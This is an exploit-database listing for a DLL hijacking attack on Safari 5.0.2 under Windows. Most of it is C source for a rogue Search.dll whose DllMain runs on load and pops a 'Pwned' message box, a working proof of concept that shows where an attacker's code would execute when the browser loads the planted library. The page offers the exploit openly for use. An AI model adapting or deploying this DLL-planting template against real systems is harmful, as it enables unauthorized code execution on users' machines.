Lucene search

K
zdtPoisonCode1337DAY-ID-14911
HistoryNov 20, 2010 - 12:00 a.m.

Safari Browser 5.0.2 DLL Hijacking Exploit (Search.dll)

2010-11-2000:00:00
PoisonCode
0day.today
12

Exploit for windows platform in category local exploits

=======================================================
Safari Browser 5.0.2 DLL Hijacking Exploit (Search.dll)
=======================================================

# Title:Safari Browser 5.0.2 DLL Hijacking Exploit(Search.dll)
# Software:http://www.apple.com/es/safari/download/
# Version: 5.0.2
# Tested on: Windows
# Author: PoisonCode
# Email:  [email protected]
# Published: 2010-11-19
# CVE-ID:()
  
_____    _____                      _ _       
|  __ \ / ____|                    (_) |      
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/


#include <windows.h>
#define DllExport __declspec (dllexport)
int PS()
{
  MessageBox(0, "Pwned by PoisonCode-PanamaSecurity", "PSecurity", MB_OK);
  return 0;
}
BOOL WINAPI  DllMain (
			HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
			{
	PS();}



#  0day.today [2018-03-14]  #